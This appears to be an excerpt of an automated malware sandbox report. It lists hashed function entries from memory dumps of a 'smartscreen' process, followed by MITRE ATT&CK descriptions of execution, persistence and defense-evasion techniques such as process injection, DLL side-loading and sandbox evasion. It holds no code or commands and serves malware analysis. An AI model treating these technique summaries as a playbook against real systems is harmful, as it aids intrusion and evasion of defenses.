API ID:
String ID:
API String ID:
Opcode ID: c4801e85882578b0c7be04fb253afe8f4dae3996eddf9ea7a993b8ae31c58d36
Instruction ID: cdb128a8adb50de4246773cd4e483ba3bf484df14c4357f3eb372faa0bcca414
Opcode Fuzzy Hash: c4801e85882578b0c7be04fb253afe8f4dae3996eddf9ea7a993b8ae31c58d36
Instruction Fuzzy Hash: 59511370E0D50A8FEB54EBA8E8596EDBBB1EF49341F40417AD009E72D2DB38A944CB54

Function 00007FF848F32125 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2218082599.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f30000_smartscreen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dabcf92c2da3a3bc0fea988456a283a365da41101fb3a6d977a3021068f770b7
Instruction ID: 3dcf63fd3d84e0dfe3fca797117b1b239aa351c05bcd8d87e3caf110405a8d55
Opcode Fuzzy Hash: dabcf92c2da3a3bc0fea988456a283a365da41101fb3a6d977a3021068f770b7
Instruction Fuzzy Hash: BB411231E0D68A4FE746FBB898591B8BBE1EF5A381F0440BBD40DC71D2DF28A8418365

Function 00007FF848F3BD72 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2218082599.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f3a000_smartscreen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 438732f36b9073de214aeedf25edfd9fb185642f740925e985bc2d53164ab10a
Instruction ID: 3c5199a282de87dee81a317a4ec4176b0d9a3cbeef695b0ddd690d8d7158ff7b
Opcode Fuzzy Hash: 438732f36b9073de214aeedf25edfd9fb185642f740925e985bc2d53164ab10a
Instruction Fuzzy Hash: 2731A571E2C91D9EEB94EB6898956FCB7B1FF98340F50417AD00DE3282DF2468819B44

Function 00007FF848F3C4FB Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2218082599.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f3a000_smartscreen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64bedc91dc721e55bb82121ed1bf94847b4e11f17c1bbea94437fbba6ee334fc
Instruction ID: 31ab6b10a293e18d9e3b15bd3dff50aef6948cf7c55e69393acd0ac557e4f2e2
Opcode Fuzzy Hash: 64bedc91dc721e55bb82121ed1bf94847b4e11f17c1bbea94437fbba6ee334fc
Instruction Fuzzy Hash: 2D215076D1E55A9FE791B7ACB8051FD37A0FF613A5F040237D50C890C2EF2C645082A9

Function 00007FF848F3BDEA Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2218082599.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f3a000_smartscreen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3104df789423bc4365ac90645bf13da97e1462ea8cbbf8a88497687ff6d6b9e
Instruction ID: b601fa01b82e83f9304b9ad19136bd3bef672ef2b8dc840f0789cbe73ff5ee57
Opcode Fuzzy Hash: d3104df789423bc4365ac90645bf13da97e1462ea8cbbf8a88497687ff6d6b9e
Instruction Fuzzy Hash: 0A21C871E1C91D8FEB94FBAC98956ACB7B1FF99340F50117AD00DE7282DF2468818B44

Function 00007FF848F337BA Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2218082599.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f30000_smartscreen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f598a4b2170c9d68d84515b8798bca757d78f33dd9e258e1b243f3de21d7daf7
Instruction ID: 9389090fe76486de380a7d54c73e7ad20b8d7ffcc28a17e18cf9e0962267011a
Opcode Fuzzy Hash: f598a4b2170c9d68d84515b8798bca757d78f33dd9e258e1b243f3de21d7daf7
Instruction Fuzzy Hash: 4531AFB1A0DA0A8FE748DF68E8157B97FE1EB96390F50017EC009C72DACBB914158B40

Function 00007FF848F30805 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2218082599.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f30000_smartscreen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fcc805e25066ae56ceb197ad35f2b4ea6e37e46d0571ce3014e0f68d89f21ee
Instruction ID: 6b065833e2d5d0188caea2d92ee29b3d48747c5b6363bb16c634657896bdb19e
Opcode Fuzzy Hash: 5fcc805e25066ae56ceb197ad35f2b4ea6e37e46d0571ce3014e0f68d89f21ee
Instruction Fuzzy Hash: 47214972D1E68ADBE344777CA85A1EA7BD0FF913A4F080173D448C90C3EE18A056C299

Function 00007FF848F33388 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2218082599.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f30000_smartscreen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4aaa8bde4f09ceae7b790468614e4d96d516f05960811b56cbae81892c6db87b
Instruction ID: d131c6fcacc03d909303028d5c552f3ff9ce179e092d0d7cd5cf0e1aaae3b70e
Opcode Fuzzy Hash: 4aaa8bde4f09ceae7b790468614e4d96d516f05960811b56cbae81892c6db87b
Instruction Fuzzy Hash: DF21EE71E085198FEB54EB98D894AEDBBF1FF98341F10403AD00AE72E5CB386944CB14

Function 00007FF848F3BCC9 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2218082599.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f3a000_smartscreen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a2f68340f50d93f1cf1175963864ad54b878e10f4cb5f98a464aa10db58a339
Instruction ID: 2da0077147fc861811be4d89fe2a498ac0de13d18a4e387dcc13da2bce81189a
Opcode Fuzzy Hash: 7a2f68340f50d93f1cf1175963864ad54b878e10f4cb5f98a464aa10db58a339
Instruction Fuzzy Hash: CE314670D1C6498FEB51EB64C8687A97BF1EF09340F0505BBC009E72D2DB38A944CB55

Function 00007FF848F33450 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2218082599.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f30000_smartscreen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4f8cc03c011df50c18f757c4acbb5b1228c26c0f7b10ed495ff011bdee6ff47
Instruction ID: 5be21fa134a2748752a058a99ea7bd35afc1a6d08dcbedcc6e89db3b86cd6075
Opcode Fuzzy Hash: d4f8cc03c011df50c18f757c4acbb5b1228c26c0f7b10ed495ff011bdee6ff47
Instruction Fuzzy Hash: A9219D3084E68A4FD743EB78C8585A9BFF4EF5A300F0944EBD449CB0A2DA289556C751

Function 00007FF848F441F9 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2218082599.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f41000_smartscreen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d424c27543835ea1af5ec8e9e553d7beaf8257997e3aec2bda221ee04c6321d7
Instruction ID: c159fb2fd5033ecea0bb2258d4fd4d167faf5b0e5307a4671383fbaee48432a6
Opcode Fuzzy Hash: d424c27543835ea1af5ec8e9e553d7beaf8257997e3aec2bda221ee04c6321d7
Instruction Fuzzy Hash: FE119D3080E64E9FEB89EF6888592B97BB0FF69305F0005BBD419E71D2DB38A584C751

Function 00007FF848F3C560 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2218082599.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f3a000_smartscreen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03cece99e72ce2ece25c9d6978cc62d21594869fb94269613bb6fc4a0cbbf289
Instruction ID: f8865af0c0daaa39dd573e89781cf9a83ad0106f0c08399289a0d360cd54d394
Opcode Fuzzy Hash: 03cece99e72ce2ece25c9d6978cc62d21594869fb94269613bb6fc4a0cbbf289
Instruction Fuzzy Hash: 15116A31C0DA8D9FEB86FB6898582B97BA0FF29341F0405BBE409C71E2EB746560C755

Function 00007FF848F3BC41 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2218082599.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f3a000_smartscreen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3255425d88a7cf1571eb15c9f8839d0e3be657bbb8cb670c490d02d499c5e071
Instruction ID: 72e1ea1216d8a325af0af1dae040781cde087a6f8bc67af045dd02a017f9d569
Opcode Fuzzy Hash: 3255425d88a7cf1571eb15c9f8839d0e3be657bbb8cb670c490d02d499c5e071
Instruction Fuzzy Hash: D1116D70919A4D8FEB98EF64C4A92BD7BE0FF18381F5109BBD40AC21A1DF35A550C704

Function 00007FF848F33575 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2218082599.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f30000_smartscreen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a34794b96b1f9732e977fb7035e5cbb067b6ea94aefa7c8376c3be0f9fb2ffa8
Instruction ID: fff7e8a78f781526e418d06b9da4d1a6fc62e7ec390f491336097bc8d3ae2cde
Opcode Fuzzy Hash: a34794b96b1f9732e977fb7035e5cbb067b6ea94aefa7c8376c3be0f9fb2ffa8
Instruction Fuzzy Hash: 39115B7091868E8FEB98EF6894592BE7BA0FF18345F4409BFE419C61D1DB34A5408704

Function 00007FF848F3B865 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2218082599.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f3a000_smartscreen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ad8171f96e7f64bd4958692dfa6f4e705e8c7295301d6a063a38e0b1540e658
Instruction ID: a54497e433563e010013428de9ff15ebe9c3a7e503155e5fc4284b6f7bea0078
Opcode Fuzzy Hash: 7ad8171f96e7f64bd4958692dfa6f4e705e8c7295301d6a063a38e0b1540e658
Instruction Fuzzy Hash: F0115B7091DA4E9FEB99EF2484A96BDBBE0FF28341F1104BBD419C6191DB35A541C704

Function 00007FF848F44A1D Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2218082599.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f41000_smartscreen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d06618239212c9c50fd28a0a88eaad261feb2b2fdf4ef4affd450224e7552ccd
Instruction ID: 62ec2595e944d508f0df1888f289636877147d4e038a87f8dc550b0bdfac5316
Opcode Fuzzy Hash: d06618239212c9c50fd28a0a88eaad261feb2b2fdf4ef4affd450224e7552ccd
Instruction Fuzzy Hash: 81118F3090E64A9FEB45EF2488692B97BA0FF28745F0404BBD409E61D2DF68A540C709

Function 00007FF848F305D8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2218082599.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f30000_smartscreen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5150a14f2a737d035e089ea168b97087369050cdc61d8b9a4b76db79a3c59dd5
Instruction ID: 34e2b5f67cced00ad3d8b661ad87822f8faf7e02c7d34229bf73a1b9fe50a2b7
Opcode Fuzzy Hash: 5150a14f2a737d035e089ea168b97087369050cdc61d8b9a4b76db79a3c59dd5
Instruction Fuzzy Hash: AB014C3090890E8EEB48FF64C0596BAB7A1FF58385F50447AE40ED22D1DF35A591CB58

Function 00007FF848F3288D Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2218082599.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f30000_smartscreen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed4677124e44a0cd23d913b4862af3eae1928190401ac0647c9965840a5eea94
Instruction ID: c67702b0d8db82ef41a39566368f00a31c0a9d6f6a44bc7b9534eaae92ef2e6c
Opcode Fuzzy Hash: ed4677124e44a0cd23d913b4862af3eae1928190401ac0647c9965840a5eea94
Instruction Fuzzy Hash: B5017C3091D64D8FE751FB6888885A9BBE0FF59342F1544B7D408C60A2EB38E484C714

Function 00007FF848F3A659 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2218082599.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f3a000_smartscreen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1df0e2ab608920f9992925bd118b324841c78e15dc9d952eeec85eaa5ce5f352
Instruction ID: cf61a2856d00b61c67cf2464cd4c6206f721e5dbedf0b8151251319660710d37
Opcode Fuzzy Hash: 1df0e2ab608920f9992925bd118b324841c78e15dc9d952eeec85eaa5ce5f352
Instruction Fuzzy Hash: 3201A23095DA899FD752BB7488585A97BE4EF1A340F1604F3D408C70E2EF34E584C711

Function 00007FF848F31C8D Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2218082599.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f30000_smartscreen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdd4820d921c578a0aa7d41955ecc5d1c0a3cd717315f945e5e4deaf3b67e3bd
Instruction ID: ff8a632836616db1c802019f906f061c54a0abc4a786bbc026afa74ee05f210a
Opcode Fuzzy Hash: bdd4820d921c578a0aa7d41955ecc5d1c0a3cd717315f945e5e4deaf3b67e3bd
Instruction Fuzzy Hash: C801813080D64D8FEB59EF2484552FA7BA1FF55341F44007AE808C62D1DB359891C744

Function 00007FF848F32F29 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2218082599.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f30000_smartscreen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 098c92017868e02c344fd2afa1e83c743bad63df35c44e2f0478a779e6e0aa58
Instruction ID: 2041a02b7ebced3c0d168ed72d2177ebd0ef2de570f977447965a28cdaf772a3
Opcode Fuzzy Hash: 098c92017868e02c344fd2afa1e83c743bad63df35c44e2f0478a779e6e0aa58
Instruction Fuzzy Hash: 42018F3095D68A4FE752FB7488595A97BE0EF19341F4504F7D409CB0E6EB38A4448705

Function 00007FF848F4780D Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2218082599.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f41000_smartscreen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d3cfa79438ed28d4d7be09ef3d641627c1c4837644134c450958aebe375527a
Instruction ID: ea91159497348e563b027b19684ee0beeeb5b7ecbcddbb484d87eba024113d9e
Opcode Fuzzy Hash: 3d3cfa79438ed28d4d7be09ef3d641627c1c4837644134c450958aebe375527a
Instruction Fuzzy Hash: 9E01BC3080EA8D8FEB49EB24C4692BA7BA0FF28744F2004BFD00AD65D2EB35A450C740

Function 00007FF848F30608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2218082599.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f30000_smartscreen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38a39f40a28caccfb6cf7a4fa4407001ed6b145652284f579ab19f6494f708aa
Instruction ID: 5dab8448672de8b2499a0eb4c2663c54380e630d6eababdff755a8991da4a16f
Opcode Fuzzy Hash: 38a39f40a28caccfb6cf7a4fa4407001ed6b145652284f579ab19f6494f708aa
Instruction Fuzzy Hash: A6016930818A0E9EEB48FBA484582BA76A1FF18346F1008BEE40EC21D1EF39A190C614

Function 00007FF848F30610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2218082599.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f30000_smartscreen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d54d2fbbf9ba85f7bf81679da9b85b2ff3c19b75ae662d1a30b8259e22bc26e
Instruction ID: c263a8b3f791e38b3187fa3f1e4cb55257158fdd0aea4355e4e585fd5d6abfee
Opcode Fuzzy Hash: 1d54d2fbbf9ba85f7bf81679da9b85b2ff3c19b75ae662d1a30b8259e22bc26e
Instruction Fuzzy Hash: B5011930919A0E9EEB59FBA484596B9B6A0FF18346F60087FE41EC21D1DF39A551C604

Function 00007FF848F3A6C5 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2218082599.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f3a000_smartscreen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d780905ae6cf1e12e31d6a413ca67cf1a32da8891e8998c0835eb522a2527719
Instruction ID: ca6fc2f7cf6b8194ec811d26559cb393d6726fea6bab4cf631666b0d6cec3aa2
Opcode Fuzzy Hash: d780905ae6cf1e12e31d6a413ca67cf1a32da8891e8998c0835eb522a2527719
Instruction Fuzzy Hash: 9CF0C23190E7824FD352AB2598A51E93BB0DF42255F0A04F7C088C60D3EB2C94848325

Function 00007FF848F305D0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2218082599.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f30000_smartscreen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c1a105b0a38799b360d01f94fc70c5d5e043360cef4162ef57bcd771b2283d1
Instruction ID: 69464ec02fd2dccc8f524894106cb2d58615811218a83e495ada5c7c8695a119
Opcode Fuzzy Hash: 8c1a105b0a38799b360d01f94fc70c5d5e043360cef4162ef57bcd771b2283d1
Instruction Fuzzy Hash: 94F04F3080D64E8FEB45FF2494552FA77A4FF55385F50057AE80DC61D1DB35A5A0C788

Function 00007FF848F327A9 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2218082599.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f30000_smartscreen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30a5cae6beb98ffbf227b03fec26d28ed62a46f2d87075a8304365406f91883d
Instruction ID: ec2df38326b3bab0985be0eec0e8ff957f0906e85c19d5360beafe24a8008e38
Opcode Fuzzy Hash: 30a5cae6beb98ffbf227b03fec26d28ed62a46f2d87075a8304365406f91883d
Instruction Fuzzy Hash: 7AF06D3080E7CD8FEB5AAF7488292A93FB1FF16242F4504BBE409C61D2EB399458C711

Function 00007FF848F3281D Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2218082599.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f30000_smartscreen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfae7d15083b4e46f984903975698a5fe5ea652fbf018dd44af6dc4e0a265ae8
Instruction ID: 8fa1bf99220e5fd284af8597e267ac2ddcc2cd086312490dd395d5b3eecbc839
Opcode Fuzzy Hash: cfae7d15083b4e46f984903975698a5fe5ea652fbf018dd44af6dc4e0a265ae8
Instruction Fuzzy Hash: 4EF09A3180E78A8FEB59AF6484592B93BA0FF15352F5005BFE809C21D2EB39A451C640

Function 00007FF848F3B49F Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2218082599.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f3a000_smartscreen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e11e3684a3f3b95ab26d1a3dacf67c5e66d3aa4c898b9da134c213be4eda6535
Instruction ID: f1d67cf959bd072c4ec5597e5b74e02f0cd8945e4a5fedccf97a8ca36bc62dd6
Opcode Fuzzy Hash: e11e3684a3f3b95ab26d1a3dacf67c5e66d3aa4c898b9da134c213be4eda6535
Instruction Fuzzy Hash: B7F0F471D1881A8EEBA9EB18C855BE9B3B1FF98341F1042A6C40DD3295CF34AAC18F44

Function 00007FF848F42812 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2218082599.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f41000_smartscreen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af9d6e9dc3ae94dc9821eb57cf3e263f34ed4271c3cd14bb92aa1cb14700403c
Instruction ID: 44f3a607efdbc9b1d7af895f41caca7e4b9472a66f7ca0f5229731fbd1a2581b
Opcode Fuzzy Hash: af9d6e9dc3ae94dc9821eb57cf3e263f34ed4271c3cd14bb92aa1cb14700403c
Instruction Fuzzy Hash: 83F0B230D0860A8FEB44EBA8C455AACB7A1EB58340F21863AC009E72D1EB386544CB48

Function 00007FF848F35CE1 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2218082599.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f30000_smartscreen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b0d116d8f21b7c488de3e0c2f2efd555bf3d0d2861b7c35ba48b7ef54464ce9
Instruction ID: 77a8f2633f292128cca7972da620880d70b844b46cacad9b3fe04655eace1ecf
Opcode Fuzzy Hash: 3b0d116d8f21b7c488de3e0c2f2efd555bf3d0d2861b7c35ba48b7ef54464ce9
Instruction Fuzzy Hash: B1E026B4D1C95D8FDBA4EB1488507A877B1AB58346F5000EA860DE3291DE3469809F19

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
